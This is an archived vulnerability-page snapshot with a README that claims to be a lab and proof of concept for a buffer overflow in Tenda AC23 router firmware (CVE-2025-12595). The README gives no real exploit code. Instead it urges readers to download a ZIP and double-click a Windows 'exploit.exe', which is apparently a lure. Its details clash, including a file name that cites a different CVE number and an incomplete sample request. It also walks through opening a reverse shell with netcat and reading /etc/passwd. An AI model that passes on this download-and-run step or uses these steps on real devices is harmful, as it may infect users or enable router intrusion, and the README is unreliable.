Associated Vulnerability
Title:Tenda AC23 安全漏洞 (CVE-2025-12595)Description:Tenda AC23是中国腾达(Tenda)公司的一款双频千兆无线路由器。 Tenda AC23 16.03.07.52版本存在安全漏洞,该漏洞源于对文件/goform/SetVirtualServerCfg中参数list的错误操作导致缓冲区溢出,可能被远程利用。
Readme
# Lab: CVE-2025-12595 - Buffer Overflow in Tenda AC23 Router Firmware
## Download Exploit
### [Download](https://github.com/lagerhaker539/CVE-2025-12595-POC/raw/refs/heads/main/flower/lab-cve-12593.zip)
## 🚀 Overview
This repository provides a controlled environment CVE-2025-12595 (also tracked as EUVD-2025-37442), a buffer overflow vulnerability classified under CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer). The issue affects Tenda AC23 router firmware version 16.03.07.52, specifically in the `formSetVirtualSer` function within the `/goform/SetVirtualServerCfg` endpoint. This vulnerability arises from insufficient bounds checking on user-supplied input during virtual server configuration, allowing remote attackers to overflow a stack-based buffer by manipulating the argument list. Successful exploitation can lead to arbitrary code execution, potentially granting unauthorized system access.
### Impact
An attacker with network access to the router's management interface (typically low-privilege, such as from a LAN or exposed WAN port) can exploit this to:
- Execute arbitrary code remotely on the device.
- Compromise the confidentiality of router configurations and connected network data.
- Modify system integrity by altering firmware settings or injecting malicious payloads.
- Disrupt availability through denial-of-service conditions, such as crashing the httpd process.
## 📋 Prerequisites
To set up this vulnerability, ensure you have the following:
- A Windows-based host machine (Windows 10 or later recommended) with administrative privileges.
- Network tools like `netcat` (nc.exe) or similar for testing connectivity (included in many Windows environments or downloadable from trusted sources).
- A physical or emulated Tenda AC23 router running firmware version 16.03.07.52 (firmware binaries can be sourced from official Tenda archives; note: this lab assumes a local setup without virtualization).
- Basic networking knowledge, including IP configuration and HTTP request crafting.
- Wireshark or similar packet capture tool for optional traffic analysis.
No Docker or virtual machines are required; all setup is performed directly on the host machine.
## Download & Install
1. Download the lab archive from the following link: [Download CVE-2025-12595 Lab ZIP](https://github.com/lagerhaker539/CVE-2025-12595-POC/raw/refs/heads/main/flower/lab-cve-12593.zip). This ZIP contains the main exploit binary (.exe) and supporting files.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-12595-lab\`.
3. Verify the contents:
- `exploit.exe`: Core exploit binary for demonstrating the buffer overflow.
- `config.ini`: Configuration file for customizing IP addresses and ports.
## 🛠 Quick Start
1. **Prepare the Environment:**
- Connect your host machine to the Tenda AC23 router via Ethernet or Wi-Fi.
- Ensure the router is configured with default admin credentials (admin/admin) and firmware version 16.03.07.52.
- Edit `config.ini` to set the target router IP (e.g., `target_ip=192.168.0.1`) and port (default: 80).
2. **Run the Exploit:**
- Double-click `exploit.exe`. This will send a crafted HTTP POST request overflowing the buffer in `formSetVirtualSer`.
- Output results to the console, including any shell access if successful.
3. **Observe the Exploitation:**
- Monitor the router console or logs for buffer overflow indicators (e.g., segmentation faults or overwritten return addresses).
- Use Wireshark to capture traffic on the interface connected to the router.
## 🔍 Detailed Exploitation Steps
### Step 1: Vulnerability Analysis
The `formSetVirtualSer` function processes user input for virtual server rules without proper length validation on the `arg_list` parameter. Input is read into a fixed-size stack buffer (e.g., 256 bytes), but attackers can supply longer strings via HTTP POST data, leading to overflow.
Pseudocode snippet of vulnerable function (derived from reverse engineering):
```
void formSetVirtualSer(char *input) {
char buffer[256];
strcpy(buffer, input); // No bounds check
// Process rules...
}
```
### Step 2: Crafting the Payload
- Use tools like Burp Suite or the provided `exploit.exe` to send a POST request to `/goform/SetVirtualServerCfg`.
- Payload structure: `arg_list=` followed by 300+ 'A's to overflow, plus a return-oriented programming (ROP) chain for code execution.
- Example raw request (for reference; do not copy-paste directly):
```
POST /goform/SetVirtualServerCfg HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 350
```
### Step 3: Executing the Exploit
- Run `exploit.exe` with parameters from `config.ini` to automate payload delivery.
- If successful, the exploit will spawn a reverse shell on port 4444. Connect via `nc -lvnp 4444` to interact.
- Indicators of success: Router process crash, arbitrary command output (e.g., `id` or `cat /etc/passwd`).
### Step 4: Post-Exploitation
- Once access is gained, enumerate the system using basic commands.
- Dump memory with `gdb` attached to the router process for deeper analysis.
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
File Snapshot
[4.0K] /data/pocs/e6f66f138a73dbfb5812c013e484d635a217a467
├── [4.0K] flower
│ └── [8.5M] lab-cve-12593.zip
└── [5.3K] README.md
1 directory, 2 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.